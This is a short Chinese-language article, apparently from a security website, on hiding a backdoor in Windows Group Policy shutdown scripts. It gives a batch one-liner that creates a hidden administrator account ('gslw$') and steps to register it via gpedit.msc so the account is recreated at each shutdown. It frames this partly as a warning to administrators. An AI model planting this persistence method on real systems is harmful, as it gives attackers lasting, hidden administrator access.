組策略欺騙，最隱蔽的后門

組策略后門更加隱蔽。往冊表中添加相應鍵值實現隨系統啟動而運行是木馬常用的伎倆，也為大家所熟知。其實，在最策略中也可以實現該功能，不僅如此它還可以實現在系統關機時進行某些操作。這就是通過最策略的“腳本（啟動/關機）”項來說實現。具體位置在“計算機配置→Windows設置”項下。因為其極具隱蔽性，因此常常被攻擊者利用來做服務器后門。

攻擊者獲得了服務器的控制權就可以通過這個后門實施對對主機的長期控制。它可以通過這個后門運行某些程序或者腳本，最簡單的比如創建一個管理員用戶，他可以這樣做：

（1）創建腳本

創建一個批處理文件add.bat，add.bat的內容是：

@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit 

（創建一個用戶名為gslw$密碼為test168的管理員用戶）。

（2）后門利用

在“運行”對話框中輸入gpedit.msc，定位到“計算機配置一>Windows設置一>腳本（啟動/關機）”， 雙擊右邊窗口的“關機”，在其中添加add.bat。就是說當系統關機時創建gslw$用戶。對于一般的用戶是根本不知道在系統中有一個隱藏用戶，就是他看見并且刪除了該帳戶，當系統關機時又會創建該帳戶。所以說，如果用戶不知道組策略中的這個地方那他一定會感到莫名其妙。

其實，對于組策略中的這個“后門”還有很多利用法，攻擊者通過它來運行腳本或者程序，嗅探管理員密碼等等。當他們獲取了管理員的密碼后，就不用在系統中創建帳戶了，直接利用管理員帳戶遠程登錄系統。因此它也是“雙刃劍”，希望大家重視這個地方。當你為服務器被攻擊而莫名其妙時，說不定攻擊者就是通過它實現的。（圖6）

【編輯推薦】

1. 后門木馬隱藏技術分析
2. WINDOWS系統后門實例一
3. 如何全面清除計算機電腦病毒
4. WINDOWS系統后門實例二 圖
5. Windows組策略保障共享目錄安全
6. 安全設置Windows組策略有效阻止黑客